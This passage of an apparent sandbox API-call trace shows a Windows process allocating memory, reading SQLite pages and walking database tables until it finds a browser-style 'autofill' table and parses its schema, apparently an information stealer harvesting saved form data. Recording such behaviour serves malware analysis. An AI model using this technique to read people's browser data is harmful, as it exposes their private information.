libOffset=0x10, cb=0x0, dwLockType=0x0) returned 0x0 [0591.055] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.055] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0591.055] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0591.055] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.055] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0591.055] LocalAlloc (uFlags=0x40, uBytes=0xd1) returned 0x2ed5140 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x15, cb=0x0, dwLockType=0x0) returned 0x0 [0591.055] IStream:SetSize (This=0x63a0f8, libNewSize=0x2ed5140) returned 0x0 [0591.055] LocalAlloc (uFlags=0x40, uBytes=0xd9) returned 0x2ed0148 [0591.055] LocalFree (hMem=0x2ed5140) returned 0x0 [0591.055] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.055] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.055] lstrcmpiA (lpString1="meta", lpString2="autofill") returned 1 [0591.055] LocalFree (hMem=0x58d840) returned 0x0 [0591.055] LocalFree (hMem=0x58d548) returned 0x0 [0591.055] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.055] LocalFree (hMem=0x58d970) returned 0x0 [0591.055] LocalFree (hMem=0x2ed0148) returned 0x0 [0591.055] LocalFree (hMem=0x56ff38) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0a8, libOffset=0x67cf, cb=0x0, dwLockType=0x0) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0a8, libOffset=0x67cf, cb=0x0, dwLockType=0x0) returned 0x0 [0591.055] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0a8, libOffset=0x67d0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.055] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.055] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.055] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0a8, libOffset=0x67d1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.055] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.055] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.055] LocalFree (hMem=0x2edb848) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.055] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.055] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.055] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.056] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0591.056] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.056] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0591.056] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.056] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x570078 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:SetSize (This=0x63a0f8, libNewSize=0x570078) returned 0x0 [0591.056] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1a20 [0591.056] LocalFree (hMem=0x570078) returned 0x0 [0591.056] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x57c6e0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x22, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.056] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0591.056] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0f8, libOffset=0x26, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.056] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0591.056] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0591.056] LocalFree (hMem=0x56ff38) returned 0x0 [0591.056] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.056] lstrcmpiA (lpString1="sqlite_autoindex_meta_1", lpString2="autofill") returned 1 [0591.056] LocalFree (hMem=0x58d970) returned 0x0 [0591.056] LocalFree (hMem=0x5d1a20) returned 0x0 [0591.056] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.056] LocalFree (hMem=0x58d548) returned 0x0 [0591.056] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.056] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0a8, libOffset=0x648a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0a8, libOffset=0x648a, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.056] IStream:LockRegion (This=0x63a0a8, libOffset=0x648b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.056] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0a8, libOffset=0x648c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.057] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.057] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0a8, libOffset=0x648d, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.057] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.057] LocalFree (hMem=0x2edb848) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.057] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ffd8 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.057] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0591.057] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.057] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0591.057] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.057] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.057] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.057] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.057] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d8d8 [0591.057] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.057] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0591.058] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.058] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d970 [0591.058] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x1c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.058] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.058] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0591.058] LocalAlloc (uFlags=0x40, uBytes=0x33d) returned 0x2edb848 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x1d, cb=0x0, dwLockType=0x0) returned 0x0 [0591.058] IStream:SetSize (This=0x63a0f8, libNewSize=0x2edb848) returned 0x0 [0591.058] LocalAlloc (uFlags=0x40, uBytes=0x345) returned 0x2edbb90 [0591.058] LocalFree (hMem=0x2edb848) returned 0x0 [0591.058] LocalFree (hMem=0x56ffd8) returned 0x0 [0591.058] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.058] lstrcmpiA (lpString1="keywords", lpString2="autofill") returned 1 [0591.058] LocalFree (hMem=0x58d548) returned 0x0 [0591.058] LocalFree (hMem=0x58d8d8) returned 0x0 [0591.058] LocalFree (hMem=0x58d970) returned 0x0 [0591.058] LocalFree (hMem=0x58d840) returned 0x0 [0591.058] LocalFree (hMem=0x2edbb90) returned 0x0 [0591.058] LocalFree (hMem=0x56ff38) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x637b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x637b, cb=0x0, dwLockType=0x0) returned 0x0 [0591.058] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x637c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.058] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x637d, cb=0x0, dwLockType=0x0) returned 0x0 [0591.058] IStream:SetSize (This=0x63a0a8, libNewSize=0x52da5f) returned 0x0 [0591.058] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2edb848 [0591.058] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da74 | out: ppstm=0x52da74*=0x63a0f8) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0a8, libOffset=0x637e, cb=0x0, dwLockType=0x0) returned 0x0 [0591.058] IStream:SetSize (This=0x63a0a8, libNewSize=0x2edb848) returned 0x0 [0591.058] IStream:Commit (This=0x63a0f8, grfCommitFlags=0x2edb848) returned 0x0 [0591.058] LocalFree (hMem=0x2edb848) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0591.058] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.058] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.058] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0591.059] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0591.059] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0591.059] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0591.059] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0591.059] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0591.059] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da1f) returned 0x0 [0591.059] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0591.059] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0591.059] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.059] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0591.059] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.059] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0591.059] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.059] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d970 [0591.059] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.059] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x14, cb=0x0, dwLockType=0x0) returned 0x0 [0591.059] IStream:SetSize (This=0x63a0f8, libNewSize=0x57c6e0) returned 0x0 [0591.059] LocalAlloc (uFlags=0x40, uBytes=0x90) returned 0x58d8d8 [0591.059] LocalFree (hMem=0x57c6e0) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x1c, cb=0x0, dwLockType=0x0) returned 0x0 [0591.059] IStream:SetSize (This=0x63a0f8, libNewSize=0x52da13) returned 0x0 [0591.059] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0591.059] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x5dc458 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0591.059] IStream:LockRegion (This=0x63a0f8, libOffset=0x1d, cb=0x0, dwLockType=0x0) returned 0x0 [0591.059] IStream:SetSize (This=0x63a0f8, libNewSize=0x5dc458) returned 0x0 [0591.059] LocalAlloc (uFlags=0x40, uBytes=0x146) returned 0x2edb848 [0591.059] LocalFree (hMem=0x5dc458) returned 0x0 [0591.059] LocalFree (hMem=0x56ff38) returned 0x0 [0591.059] IUnknown:Release (This=0x63a0f8) returned 0x0 [0591.060] lstrcmpiA (lpString1="autofill", lpString2="autofill") returned 0 [0591.060] lstrcmpA (lpString1="table", lpString2="table") returned 0 [0591.060] StrStrIA (lpFirst="CREATE TABLE autofill (name VARCHAR, value VARCHAR, value_lower VARCHAR, date_created INTEGER DEFAULT 0, date_last_used INTEGER DEFAULT 0, count INTEGER DEFAULT 1, PRIMARY KEY (name, value))", lpSrch="(") returned="(name VARCHAR, value VARCHAR, value_lower VARCHAR, date_created INTEGER DEFAULT 0, date_last_used INTEGER DEFAULT 0, count INTEGER DEFAULT 1, PRIMARY KEY (name, value))" [0591.060] StrStrIA (lpFirst="name VARCHAR, value VARCHAR, value_lower VARCHAR, date_created INTEGER DEFAULT 0, date_last_used INTEGER DEFAULT 0, count INTEGER DEFAULT 1, PRIMARY KEY (name, value))", lpSrch=")") returned="))" [0591.060] lstrlenA (lpString="name VARCHAR") returned 12 [0591.060] StrStrIA 